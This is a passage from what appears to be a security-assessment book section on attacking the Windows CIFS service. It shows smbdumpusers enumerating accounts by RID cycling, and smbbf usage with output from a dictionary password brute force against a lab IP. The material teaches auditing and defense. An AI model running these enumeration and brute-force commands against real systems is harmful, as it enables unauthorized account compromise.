9.6 The CIFS Service

The Common Internet File System (CIFS) is found running on Windows 2000, XP, and 2003 hosts through both TCP and UDP port 445. CIFS is the native mode for SMB access within these operating systems, but NetBIOS access is provided for backward compatibility.

Through CIFS, you can perform exactly the same tests as with the NetBIOS session service, including enumeration of user and system details, brute-force of user passwords, and system access upon authenticating (such as file access and execution of arbitrary commands).

9.6.1 CIFS Enumeration

In the same way that system and user information can be gathered through accessing SMB services through NetBIOS, CIFS can be directly queried to enumerate the same information: you just need the right tools for the job.

The SMB Auditing Tool (SMB-AT) is a suite of useful utilities, available as Win32 executables and source code (for compilation on Linux and BSD platforms in particular) from http://www.cqure.net.

9.6.1.1 User enumeration through smbdumpusers

The smbdumpusers utility is a highly versatile Windows NT user enumeration tool that can query SMB through both NetBIOS session (TCP 139) and CIFS (TCP 445) services. A second useful feature is the way the utility can enumerate users through a direct dump that works with RestrictAnonymous=0, but also using the RID cycling technique that can evade RestrictAnonymous=1 settings by attempting to reverse each ID value to a username. Example 9-20 shows the usage and command-line options for smbdumpusers.

Example 9-20. smbdumpusers usage and command-line options

D:\smb-at> smbdumpusers  SMB - DumpUsers V1.0.4 by (patrik.karlsson@ixsecurity.com)  -------------------------------------------------------------------  usage: smbdumpusers -i <ipaddress|ipfile> [options]          -i*     IP or <filename> of server[s] to bruteforce          -m      Specify which mode                      1 Dumpusers (Works with restrictanonymous=0)                      2 SidToUser (Works with restrictanonymous=0|1)          -f      Filter output                      0 Default (Filter Machine Accounts)                      1 Show All          -e      Amount of sids to enumerate          -E      Amount of sid mismatches before aborting mode 2          -n      Start at SID          -s      Name of the server to bruteforce          -r      Report to <ip>.txt          -t      timeout for connect (default 300ms)          -v      Be verbose          -P      Protocol version                      0 - Netbios Mode                      1 - Windows 2000 Native Mode

Example 9-21 shows the smbdumpusers tool dumping user information via RID cycling (as with GetAcct in Figure 9-3) through CIFS.

Example 9-21. Cycling RID values to find usernames with smbdumpusers

D:\smb-at> smbdumpusers -i 192.168.189.1 -m 2 -P1 500-Administrator 501-Guest 513-None 1000-__vmware_  _ 1001-__vmware_user_  _ 1002-VUSR_OSG-SERV 1003-mickey

9.6.2 CIFS Brute Force

The SMB-AT toolkit contains a utility called smbbf that can launch brute-force password-grinding attacks against both NetBIOS session and CIFS services. Example 9-22 shows the smbbf usage.

Example 9-22. smbbf usage and command-line options

D:\smb-at> smbbf  SMB - Bruteforcer V1.0.4 by (patrik.karlsson@ixsecurity.com)  --------------------------------------------------------------  usage: smbbf -i [options]          -i*     IP address of server to bruteforce          -p      Path to file containing passwords          -u      Path to file containing users          -s      Server to bruteforce          -r      Path to report file          -t      timeout for connect (default 300ms)          -w      Workgroup/Domain          -g      Be nice, automaticaly detect account lockouts          -v      Be verbose          -P      Protocol version                      0 - Netbios Mode                      1 - Windows 2000 Native Mode

To run smbbf against the CIFS service at 192.168.189.1, using the user list from users.txt and the dictionary file common.txt, use the syntax shown in Example 9-23.

Example 9-23. Using smbbf against the CIFS service

D:\smb-at> smbbf -i 192.168.189.1 -p common.txt -u users.txt -v -P1 INFO: Could not determine server name ... -- Starting password analysis on 192.168.189.1 -- Logging in as Administrator  with secret on WIDGETS Access denied Logging in as Administrator  with qwerty on WIDGETS Access denied Logging in as Administrator  with letmein on WIDGETS Access denied Logging in as Administrator  with password on WIDGETS Access denied Logging in as Administrator  with abc123 on WIDGETS Access denied

The smbbf utility can clock around 1,200 login attempts per second when grinding Windows 2000 hosts across local area networks. Against NT 4.0 hosts, the tool is much slower, achieving only a handful of login attempts per second.

If smbbf is run with only an IP address specified, it does the following:

• Retrieves a list of valid usernames through a null session

• Attempts to log in to each account with a blank password

• Attempts to log in to each account with the username as password

• Attempts to log in to each account with the password of "password"

The tool is extremely useful in this mode when performing a brief audit of a given Windows host, and can be left running unattended for extended periods of time. If multiple accounts are given to brute force, the tool will grind passwords for each account and move to the next.